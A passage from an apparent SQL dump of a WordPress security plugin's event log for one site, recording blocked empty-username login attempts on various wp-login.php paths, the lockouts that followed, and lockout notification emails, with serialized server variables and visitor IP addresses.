m.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX@PHkXpgmG5P@iB8kJ8wAAAIg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569062460.8344\";s:12:\"REQUEST_TIME\";s:10:\"1569062460\";}}','notice','2019-09-21 10:41:02','2019-09-21 10:41:01',17804096,19290400,'https://bintara.com.my/2019/wp-login.php',1,0,'173.249.49.134'),(25262,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX@JrfBTP0kPOVnb8jo3wAAAEs\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"142.93.99.56\";s:11:\"REMOTE_PORT\";s:5:\"34640\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX@JrfBTP0kPOVnb8jo3wAAAEs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569062438.8808\";s:12:\"REQUEST_TIME\";s:10:\"1569062438\";}}','notice','2019-09-21 10:40:40','2019-09-21 10:40:39',17797768,19288440,'https://bintara.com.my/wordpress/wp-login.php',1,0,'142.93.99.56'),(25260,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:39:51\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:39:51\";s:14:\"lockout_expire\";s:19:\"2019-09-21 18:54:51\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 10:54:51\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:39:52','2019-09-21 10:39:51',17884208,19289448,'https://bintara.com.my/2019/wp-login.php',1,0,'142.93.108.189'),(25261,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:39:52','2019-09-21 10:39:51',18089832,19289448,'https://bintara.com.my/2019/wp-login.php',1,0,'142.93.108.189'),(25257,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:39:44\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:39:44\";s:14:\"lockout_expire\";s:19:\"2019-09-21 18:54:44\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 10:54:44\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:39:45','2019-09-21 10:39:44',17883096,19289624,'https://bintara.com.my/wordpress/wp-login.php',1,0,'103.22.250.194'),(25258,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:39:45','2019-09-21 10:39:44',18088784,19289624,'https://bintara.com.my/wordpress/wp-login.php',1,0,'103.22.250.194'),(25259,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX993kXpgmG5P@iB8kJkQAAAI4\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"142.93.108.189\";s:11:\"REMOTE_PORT\";s:5:\"58496\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX993kXpgmG5P@iB8kJkQAAAI4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569062391.6153\";s:12:\"REQUEST_TIME\";s:10:\"1569062391\";}}','notice','2019-09-21 10:39:52','2019-09-21 10:39:51',17799352,19289448,'https://bintara.com.my/2019/wp-login.php',1,0,'142.93.108.189'),(25255,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:38:57','2019-09-21 10:38:56',18090184,19289808,'https://bintara.com.my/test/wp-login.php',1,0,'103.254.209.198'),(25256,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX98FiJ7D9Gn7wDPh8TYQAAANI\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"103.22.250.194\";s:11:\"REMOTE_PORT\";s:5:\"33472\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX98FiJ7D9Gn7wDPh8TYQAAANI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569062384.6215\";s:12:\"REQUEST_TIME\";s:10:\"1569062384\";}}','notice','2019-09-21 10:39:45','2019-09-21 10:39:44',17798200,19289624,'https://bintara.com.my/wordpress/wp-login.php',1,0,'103.22.250.194'),(25254,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:38:56\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:38:56\";s:14:\"lockout_expire\";s:19:\"2019-09-21 18:53:56\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 10:53:56\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:38:57','2019-09-21 10:38:56',17884072,19289808,'https://bintara.com.my/test/wp-login.php',1,0,'103.254.209.198'),(25251,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:38:20\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:38:20\";s:14:\"lockout_expire\";s:19:\"2019-09-21 18:53:20\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 10:53:20\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:38:21','2019-09-21 10:38:20',17883816,19289312,'https://bintara.com.my/blog/wp-login.php',1,0,'103.81.84.140'),(25252,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:38:21','2019-09-21 10:38:20',18089528,19289312,'https://bintara.com.my/blog/wp-login.php',1,0,'103.81.84.140'),(25253,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX9v1iJ7D9Gn7wDPh8TXAAAAM8\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"103.254.209.198\";s:11:\"REMOTE_PORT\";s:5:\"46550\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX9v1iJ7D9Gn7wDPh8TXAAAAM8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569062335.9597\";s:12:\"REQUEST_TIME\";s:10:\"1569062335\";}}','notice','2019-09-21 10:38:57','2019-09-21 10:38:56',17799776,19289808,'https://bintara.com.my/test/wp-login.php',1,0,'103.254.209.198'),(25248,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:38:18\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:38:18\";s:14:\"lockout_expire\";s:19:\"2019-09-21 18:53:18\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 10:53:18\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:38:19','2019-09-21 10:38:18',17881032,19287040,'https://bintara.com.my/wp/wp-login.php',1,0,'198.72.112.193'),(25249,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:38:19','2019-09-21 10:38:18',18086792,19287040,'https://bintara.com.my/wp/wp-login.php',1,0,'198.72.112.193'),(25250,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX9m3kXpgmG5P@iB8kJTgAAAJg\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"103.81.84.140\";s:11:\"REMOTE_PORT\";s:5:\"48232\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX9m3kXpgmG5P@iB8kJTgAAAJg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569062300.0659\";s:12:\"REQUEST_TIME\";s:10:\"1569062300\";}}','notice','2019-09-21 10:38:21','2019-09-21 10:38:20',17798976,19289312,'https://bintara.com.my/blog/wp-login.php',1,0,'103.81.84.140'),(25245,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:37:21\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:37:21\";s:14:\"lockout_expire\";s:19:\"2019-09-21 18:52:21\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 10:52:21\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:37:22','2019-09-21 10:37:21',17883816,19289312,'https://bintara.com.my/test/wp-login.php',1,0,'93.114.86.226'),(25246,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:37:22','2019-09-21 10:37:21',18089528,19289312,'https://bintara.com.my/test/wp-login.php',1,0,'93.114.86.226'),(25247,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTT